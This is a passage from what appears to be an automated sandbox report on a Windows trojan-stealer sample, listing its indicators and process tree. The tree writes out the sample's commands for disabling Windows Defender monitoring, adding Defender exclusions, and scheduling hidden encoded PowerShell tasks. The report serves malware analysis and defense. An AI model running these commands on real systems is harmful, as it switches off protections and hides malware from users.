94554e1b98b18ba4acb922c60cc15599f2d26e3f5e26f2a33e50b63d72c5003e

Analysis

max time kernel
151s
max time network
135s
platform
windows7_x64
resource
win7-20230824-en
resource tags

arch:x64arch:x86image:win7-20230824-enlocale:en-usos:windows7-x64system
submitted
30/08/2023, 00:47

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.2MB
MD5

b9674d1bde76f639e61b00068a2c64e2
SHA1

98743bcfa8791edd6faf435b369afb966ee75f12
SHA256

94554e1b98b18ba4acb922c60cc15599f2d26e3f5e26f2a33e50b63d72c5003e
SHA512

ce66d00bd303027b56f74ea3e55ffd3077eaeed67a0fbd34185b94adc6a7ad6c8170dd7a06f29492d5248009a22445370fbc297ef2d29f488fd566e8c2f4e2bd
SSDEEP

196608:91OfcZO8H33MCSywKD3ch1RrR2A+BpFBBeoADG8zk:3OQHMlNKDMxcAkFlADG84

Score

10^/10

evasion spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 40 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\adLuHsOJyjUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ETTEuhzQIfzU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZgGUdwsAfooOjcVzNqR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oAKDHoGOizvTC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\ZqEtjfMwsOquFNVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\yEozQfewRisDOrBy = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\yEozQfewRisDOrBy = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZgGUdwsAfooOjcVzNqR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oAKDHoGOizvTC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\yEozQfewRisDOrBy = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ndYpYUlYU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\ZqEtjfMwsOquFNVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dkHuOmxSFbllBsYFT = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\adLuHsOJyjUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ndYpYUlYU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dkHuOmxSFbllBsYFT = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\yEozQfewRisDOrBy = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ETTEuhzQIfzU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Executes dropped EXE 4 IoCs

pid	Process
2852	Install.exe
1456	Install.exe
752	KLjtdkX.exe
1116	NXPuFmH.exe

Loads dropped DLL 8 IoCs

pid	Process
1136	file.exe
2852	Install.exe
2852	Install.exe
2852	Install.exe
2852	Install.exe
1456	Install.exe
1456	Install.exe
1456	Install.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	KLjtdkX.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	KLjtdkX.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	KLjtdkX.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ndYpYUlYU\TYdVgR.dll	NXPuFmH.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	NXPuFmH.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	NXPuFmH.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bmIhxToJSQNXEKLByr.job	schtasks.exe
File created	C:\Windows\Tasks\QpCASiLXBnLdYgyNl.job	schtasks.exe
File created	C:\Windows\Tasks\OFFhFINpvIMTmZm.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2596	schtasks.exe
2020	schtasks.exe
2036	schtasks.exe
2820	schtasks.exe
364	schtasks.exe
2292	schtasks.exe
2768	schtasks.exe

Modifies data under HKEY_USERS 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2104	powershell.EXE
2104	powershell.EXE
2104	powershell.EXE
2980	powershell.EXE
2980	powershell.EXE
2980	powershell.EXE
2384	powershell.EXE
2384	powershell.EXE
2384	powershell.EXE
2680	powershell.EXE
2680	powershell.EXE
2680	powershell.EXE
1116	NXPuFmH.exe
1116	NXPuFmH.exe
1116	NXPuFmH.exe
1116	NXPuFmH.exe
1116	NXPuFmH.exe
1116	NXPuFmH.exe
1116	NXPuFmH.exe
1116	NXPuFmH.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2104	powershell.EXE
Token: SeDebugPrivilege	2980	powershell.EXE
Token: SeDebugPrivilege	2384	powershell.EXE
Token: SeDebugPrivilege	2680	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1136 wrote to memory of 2852	1136	file.exe	30
PID 1136 wrote to memory of 2852	1136	file.exe	30
PID 1136 wrote to memory of 2852	1136	file.exe	30
PID 1136 wrote to memory of 2852	1136	file.exe	30
PID 1136 wrote to memory of 2852	1136	file.exe	30
PID 1136 wrote to memory of 2852	1136	file.exe	30
PID 1136 wrote to memory of 2852	1136	file.exe	30
PID 2852 wrote to memory of 1456	2852	Install.exe	31
PID 2852 wrote to memory of 1456	2852	Install.exe	31
PID 2852 wrote to memory of 1456	2852	Install.exe	31
PID 2852 wrote to memory of 1456	2852	Install.exe	31
PID 2852 wrote to memory of 1456	2852	Install.exe	31
PID 2852 wrote to memory of 1456	2852	Install.exe	31
PID 2852 wrote to memory of 1456	2852	Install.exe	31
PID 1456 wrote to memory of 1288	1456	Install.exe	33
PID 1456 wrote to memory of 1288	1456	Install.exe	33
PID 1456 wrote to memory of 1288	1456	Install.exe	33
PID 1456 wrote to memory of 1288	1456	Install.exe	33
PID 1456 wrote to memory of 1288	1456	Install.exe	33
PID 1456 wrote to memory of 1288	1456	Install.exe	33
PID 1456 wrote to memory of 1288	1456	Install.exe	33
PID 1456 wrote to memory of 2720	1456	Install.exe	35
PID 1456 wrote to memory of 2720	1456	Install.exe	35
PID 1456 wrote to memory of 2720	1456	Install.exe	35
PID 1456 wrote to memory of 2720	1456	Install.exe	35
PID 1456 wrote to memory of 2720	1456	Install.exe	35
PID 1456 wrote to memory of 2720	1456	Install.exe	35
PID 1456 wrote to memory of 2720	1456	Install.exe	35
PID 1288 wrote to memory of 2800	1288	forfiles.exe	37
PID 1288 wrote to memory of 2800	1288	forfiles.exe	37
PID 1288 wrote to memory of 2800	1288	forfiles.exe	37
PID 1288 wrote to memory of 2800	1288	forfiles.exe	37
PID 1288 wrote to memory of 2800	1288	forfiles.exe	37
PID 1288 wrote to memory of 2800	1288	forfiles.exe	37
PID 1288 wrote to memory of 2800	1288	forfiles.exe	37
PID 2720 wrote to memory of 2612	2720	forfiles.exe	38
PID 2720 wrote to memory of 2612	2720	forfiles.exe	38
PID 2720 wrote to memory of 2612	2720	forfiles.exe	38
PID 2720 wrote to memory of 2612	2720	forfiles.exe	38
PID 2720 wrote to memory of 2612	2720	forfiles.exe	38
PID 2720 wrote to memory of 2612	2720	forfiles.exe	38
PID 2720 wrote to memory of 2612	2720	forfiles.exe	38
PID 2800 wrote to memory of 2100	2800	cmd.exe	40
PID 2800 wrote to memory of 2100	2800	cmd.exe	40
PID 2800 wrote to memory of 2100	2800	cmd.exe	40
PID 2800 wrote to memory of 2100	2800	cmd.exe	40
PID 2800 wrote to memory of 2100	2800	cmd.exe	40
PID 2800 wrote to memory of 2100	2800	cmd.exe	40
PID 2800 wrote to memory of 2100	2800	cmd.exe	40
PID 2612 wrote to memory of 2700	2612	cmd.exe	39
PID 2612 wrote to memory of 2700	2612	cmd.exe	39
PID 2612 wrote to memory of 2700	2612	cmd.exe	39
PID 2612 wrote to memory of 2700	2612	cmd.exe	39
PID 2612 wrote to memory of 2700	2612	cmd.exe	39
PID 2612 wrote to memory of 2700	2612	cmd.exe	39
PID 2612 wrote to memory of 2700	2612	cmd.exe	39
PID 2800 wrote to memory of 2684	2800	cmd.exe	42
PID 2800 wrote to memory of 2684	2800	cmd.exe	42
PID 2800 wrote to memory of 2684	2800	cmd.exe	42
PID 2800 wrote to memory of 2684	2800	cmd.exe	42
PID 2800 wrote to memory of 2684	2800	cmd.exe	42
PID 2800 wrote to memory of 2684	2800	cmd.exe	42
PID 2800 wrote to memory of 2684	2800	cmd.exe	42
PID 2612 wrote to memory of 2688	2612	cmd.exe	41

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1136
- C:\Users\Admin\AppData\Local\Temp\7zSEE16.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2852
- - C:\Users\Admin\AppData\Local\Temp\7zSF27A.tmp\Install.exe
    .\Install.exe /QRfsdidCyDv "525403" /S
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:1456
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1288
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2800
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:2100
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:2684
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2720
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2612
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:2700
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:2688
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gOGPrJXaD" /SC once /ST 00:43:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:2596
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gOGPrJXaD"
      4⤵
      PID:2672
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gOGPrJXaD"
      4⤵
      PID:1828
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bmIhxToJSQNXEKLByr" /SC once /ST 00:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dkHuOmxSFbllBsYFT\GgutqIElzWxCLqI\KLjtdkX.exe\" WU /Ntsite_idwUP 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:2020

C:\Windows\system32\taskeng.exe
taskeng.exe {E7F4753B-0430-4C59-BC2C-D1FD739B4173} S-1-5-21-1528014236-771305907-3973026625-1000:DMCOTBQQ\Admin:Interactive:[1]
1⤵
PID:2648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2104
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2980
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2384
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:3060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2680
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:820

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1676

C:\Windows\system32\taskeng.exe
taskeng.exe {EA37855A-AB6F-40EB-B2A1-3E652B810856} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2108
- C:\Users\Admin\AppData\Local\Temp\dkHuOmxSFbllBsYFT\GgutqIElzWxCLqI\KLjtdkX.exe
  C:\Users\Admin\AppData\Local\Temp\dkHuOmxSFbllBsYFT\GgutqIElzWxCLqI\KLjtdkX.exe WU /Ntsite_idwUP 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:752
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gdGVLuMDV" /SC once /ST 00:48:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2036
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gdGVLuMDV"
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gdGVLuMDV"
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:364
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1212
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:2568
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2376
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gKIdgNEPl" /SC once /ST 00:06:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2820
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gKIdgNEPl"
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gKIdgNEPl"
    3⤵
    PID:1368
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yEozQfewRisDOrBy" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2292
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yEozQfewRisDOrBy" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2892
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yEozQfewRisDOrBy" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2368
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yEozQfewRisDOrBy" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:3020
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yEozQfewRisDOrBy" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1116
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yEozQfewRisDOrBy" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2976
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yEozQfewRisDOrBy" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2436
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yEozQfewRisDOrBy" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2912
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\yEozQfewRisDOrBy\RIZmvLuo\pPMmhjTMSRawRGhW.wsf"
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\yEozQfewRisDOrBy\RIZmvLuo\pPMmhjTMSRawRGhW.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2744
  - - C:\Windows\SysWOW64\reg.exe
